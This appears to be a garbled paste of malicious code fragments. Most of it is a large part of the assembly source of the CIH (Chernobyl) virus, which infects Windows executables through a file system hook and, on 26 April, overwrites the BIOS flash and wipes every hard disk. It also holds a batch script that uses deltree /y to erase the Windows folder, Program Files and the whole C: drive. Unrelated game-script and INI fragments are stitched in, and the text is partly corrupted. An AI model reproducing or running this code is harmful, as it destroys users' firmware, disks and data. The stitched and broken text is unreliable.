#include
#include
#include
main()
{
int i,j;
char tmp[20];
char far *ptr;

for (i=0;i Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-[at][esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-[at][esi]
mul cl
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-[at]FPRIVATE "TYPE=PICT;ALT=Cool"[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-[at]9)[esi]
jnc short OnlySetInfectedMark
not ecx
inc ecx
cmp cx, small CodeSizeOfMergeVirusCodeSection
jb OnlySetInfectedMark
; ***************************
; * Save Original *
; * Address of Entry Point *
; ***************************
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
mov eax, (AddressOfEntryPoint-[at]9)[esi]
add eax, (ImageBase-[at]9)[esi]
mov (OriginalAddressOfEntryPoint-[at]9)[esi], eax
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, eax
push edx ; Pointer of File
add eax, esi
push eax ; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
lea eax, [eax+edi-04h]
mov [eax], ebx
; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-[at]9)[esi]
push edi ; Address of Buffer
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov (NewAddressOfEntryPoint-[at]9)[esi], edx
; ***************************
; * Setup Initial Data *
; ***************************
lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-[at]9)[edx]
sub ebx, (VirtualSize-[at]9)[edx]
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx
mov ebx, (PointerToRawData-[at]9)[edx]
add ebx, (VirtualSize-[at]9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-[at]9)[edx]
add ebx, (VirtualAddress-[at]9)[edx]
add ebx, (ImageBase-[at]9)[esi]
mov [eax+4], ebx
mov ebx, [eax]
add (VirtualSize-[at]9)[edx], ebx
; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-[at]9)[edx], 40000040h
StartToWriteCodeToSections:
sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark
add edi, ebx ; Move Address of Buffer
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile
; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************
SetVirusCodeSectionTableEndMark:
; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp
; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx
; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
lea eax, (LastVxDCallAddress-2-[at]9)[esi]
mov cl, VxDCallTableSize
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh
mov edx, (VxDCallIDTable+(ecx-1)*04h-[at]9)[esi]
mov [eax+2], edx
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-[at]9)[esi]
sub eax, edx
loop LoopOfRestoreVxDCallID
; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]
LoopOfWriteVirusCodeToFile:
pop ecx
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile
; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf
; *************************************
; * Close File *
; *************************************
CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
popf
pop esi
jnc IsKillComputer
; *************************************
; * Restore File Modification Time *
; *************************************
mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-[at]7)[esi]
mov edi, (FileModificationTime+2-[at]7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Disable OnBusy *
; *************************************
DisableOnBusy:
dec byte ptr (OnBusy-[at]7)[esi] ; Disable OnBusy
; *************************************
; * Call Previous FileSystemApiHook *
; *************************************
prevhook:
popad
mov eax, dr0 ;
jmp [eax] ; Jump to prevhook
; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************
pIFSFunc:
mov ebx, esp
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
call [ebx+20h+04h] ; Call pIFSFunc
pop ecx ;
mov [ebx+1ch], eax ; Modify EAX Value in Stack
; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
cmp dword ptr [ebx+20h+04h+04h], 00000024h
jne QuitMyVirusFileSystemHook
; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
mov eax, [ecx+28h]
mov (FileModificationTime-[at]6)[esi], eax
; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
popad
ret
; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
IsKillComputer:
; Get Now Month from BIOS CMOS
mov ax, 0708h
out 70h, al
in al, 71h
xchg ah, al
; Get Now Day from BIOS CMOS
out 70h, al
in al, 71h
xor ax, 0426h ; 04/26/????
jne DisableOnBusy
; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************
; ***************************
; * Kill BIOS EEPROM *
; ***************************
mov bp, 0cf8h
lea esi, IOForEEPROM-[at]7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************
mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi
; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
mov di, 0058h
dec edx ; and al,0fh
mov word ptr (BooleanCalculateCode-[at]10)[esi], 0f24h
call esi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
lea ebx, EnableEEPROMToWrite-[at]10[esi]
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h
push ecx
loop $
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************
mov ah, 0e0h
mov [eax], al
; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
mov word ptr (BooleanCalculateCode-[at]10)[esi], 100ch
call esi
; ***************************
; * Kill All HardDisk *
; ************************************************** *
; * IOR Structure of IOS_SendCommand Needs *
; ************************************************** *
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ************************************************** *
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
; ***************************
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
; ***************************
; * IO for EEPROM *
; ***************************
IOForEEPROM:
[at]10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al, 44h
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
out dx, al
ret
; ************************************************** *******
; * Static Data *
; ************************************************** *******
LastVxDCallAddress = IFSMgr_Ring0_FileIO
VxDCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath
VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize = ($-VxDCallIDTable)/04h
; ************************************************** *******
; * Virus Version Copyright *
; ************************************************** *******
VirusVersionCopyright db 'CIH v'
db MajorVirusVersion+'0'
db '.'
db MinorVirusVersion+'0'
db ' TTIT'
; ************************************************** *******
; * Virus Size *
; ************************************************** *******
VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(0 8h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
; ************************************************** *******
; * Dynamic Data *
; ************************************************** *******
VirusGameDataStartAddress = VirusSize
[at]6 = VirusGameDataStartAddress
OnBusy db 0
FileModificationTime dd ?
FileNameBuffer db FileNameBufferSize dup(?)
[at]7 = FileNameBuffer
DataBuffer = $
[at]8 = DataBuffer
NumberOfSections dw ?
TimeDateStamp dd ?
SymbolsPointer dd ?
NumberOfSymbols dd ?
SizeOfOptionalHeader dw ?
_Characteristics dw ?
Magic dw ?
LinkerVersion dw ?
SizeOfCode dd ?
SizeOfInitializedData dd ?
SizeOfUninitializedData dd ?
AddressOfEntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
[at]9 = $
SectionAlignment dd ?
FileAlignment dd ?
OperatingSystemVersion dd ?
ImageVersion dd ?
SubsystemVersion dd ?
Reserved dd ?
SizeOfImage dd ?
SizeOfHeaders dd ?
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer ; DWORD
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = [at]9
SectionName = StartOfSectionTable ; QWORD
VirtualSize = StartOfSectionTable+08h ; DWORD
VirtualAddress = StartOfSectionTable+0ch ; DWORD
SizeOfRawData = StartOfSectionTable+10h ; DWORD
PointerToRawData = StartOfSectionTable+14h ; DWORD
PointerToRe********s = StartOfSectionTable+18h ; DWORD
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
NumberOfRe********s = StartOfSectionTable+20h ; WORD
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
Characteristics = StartOfSectionTable+24h ; DWORD
SizeOfScetionTable = Characteristics+04h-SectionName
; ************************************************** *******
; * Virus Total Need Memory *
; ************************************************** *******
VirusNeedBaseMemory = $
VirusTotalNeedMemory = [at]9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(0 8h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
; ************************************************** *******
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:delete Windows::.
@echo off

90,90
resizepic 0 0 5054 405 470
gumppic 10 10 5528
gumppic 2362
text 20 400 455 0
text 20 435 455 01 local.t_x=
local.t_y=
sector.allclients sendpacket 0c0 00 D D W W W B W W B B B 00 00 00 B D D

[windows]
NullPort=None
DOSver=3D213E3C6D66
StartUp=3F70
load=
run=
[boot]
oemfonts.fon=vgaoem.fon
system.drv=system.drv
drivers=mmsystem.dll power.drv
shell=Explorer.exe

C:/Windows/System32/Delete